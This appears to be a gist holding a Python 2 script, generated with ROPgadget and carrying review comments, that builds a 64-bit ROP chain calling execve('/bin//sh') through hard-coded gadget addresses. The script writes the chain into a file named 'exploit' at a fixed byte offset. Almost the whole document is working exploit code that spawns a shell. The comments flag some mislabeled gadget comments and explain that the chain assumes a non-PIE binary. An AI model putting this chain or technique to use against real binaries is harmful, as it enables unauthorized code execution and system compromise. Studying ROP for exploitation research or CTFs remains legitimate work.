
@richo
Created November 23, 2016 00:14
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
import binascii
# Padding goes here
#
# Builds a 64-bit little-endian ROP chain in `p` (each entry is one 8-byte
# `pack('<Q', ...)` value), then splices it into a copy of the file `exploit`
# at byte offset CHAIN_START and writes the result to `exploit_with_payload`.
#
# Python 2 only: `print` is used as a statement, and `p` is a `str` that mixes
# `pack()` output with the literal '/bin//sh'; under Python 3 the bytes/str
# concatenation would fail.
#
# Every gadget and data address below is a fixed absolute value, so the chain
# presupposes a binary mapped at a fixed base (non-PIE); with PIE/ASLR the
# hard-coded addresses would no longer be valid.
p = ''
p += pack('<Q', 0x0000000000401907) # pop rsi ; ret
p += pack('<Q', 0x00000000006be080) # @ .data
p += pack('<Q', 0x000000000041a124) # pop rax ; ret
p += '/bin//sh'  # 8 bytes: exactly one chain slot, consumed by the pop above
p += pack('<Q', 0x0000000000441781) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401907) # pop rsi ; ret
p += pack('<Q', 0x00000000006be088) # @ .data + 8
p += pack('<Q', 0x00000000004310a5) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000441781) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004017e6) # pop rdi ; ret
p += pack('<Q', 0x00000000006be080) # @ .data
p += pack('<Q', 0x0000000000401907) # pop rsi ; ret
p += pack('<Q', 0x00000000006be088) # @ .data + 8
p += pack('<Q', 0x000000000041a246) # pop rdx ; ret
p += pack('<Q', 0x00000000006be088) # @ .data + 8
# NOTE(review): same address as the "pop rax ; ret" entry above, but the
# comment here says "retf" -- one of the two comments is inaccurate.
p += pack('<Q', 0x000000000041a124) # pop rax ; retf
# NOTE(review): the value is 0x3b (59), not a .data address; the comment looks
# copied from the line above.  59 is the execve syscall number on x86-64 Linux,
# which matches the "execve" header comment.
p += pack('<Q', 0x000000000000003b) # @ .data +8
# Disabled alternative for loading rax; kept as-is, not part of the chain.
## # r12 = 0x22
## #p += pack('<Q', 0x000000000040e4d9) # 0x000000000040e4d9 : mov rax, r12 ; pop rbx ; pop rbp ; pop r12 ; ret
## p += pack('<Q', 0x0000000000474010) # mov rax, 7 ; ret
## # += 52
## for i in range(52):
## p += pack('<Q', 0x0000000000473f80) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000400446) # syscall
# Byte offset inside `exploit` at which the chain is written.  The "+ 5" is not
# explained here -- presumably it skips something at 0x10d0; confirm against
# the file layout before relying on it.
CHAIN_START = 0x00010d0 + 5
print len(p)  # Python 2 print statement; the chain as written is 144 bytes
# Cap the chain at 448 bytes.  A no-op for the 144-byte chain above, but if the
# chain ever grew past 448 bytes the tail (including the final syscall gadget)
# would be silently dropped.
p = p[:448]
# 'r' is text mode; on Python 2 under POSIX there is no newline translation so
# the read is byte-exact, but 'rb' would be needed on Windows.
with open('exploit', 'r') as dummy:
    with open('exploit_with_payload', 'wb') as out:
        file_content = dummy.read()
        # Print the 16 bytes currently at the splice offset (presumably to
        # confirm CHAIN_START points where expected).
        print binascii.hexlify(file_content[CHAIN_START : CHAIN_START + 16])
        # Overwrite len(p) bytes at CHAIN_START in place, so the output keeps
        # the input's length as long as the input extends past
        # CHAIN_START + len(p).
        new = file_content[:CHAIN_START]
        new += p
        new += file_content[CHAIN_START + len(p):]
        out.write(new)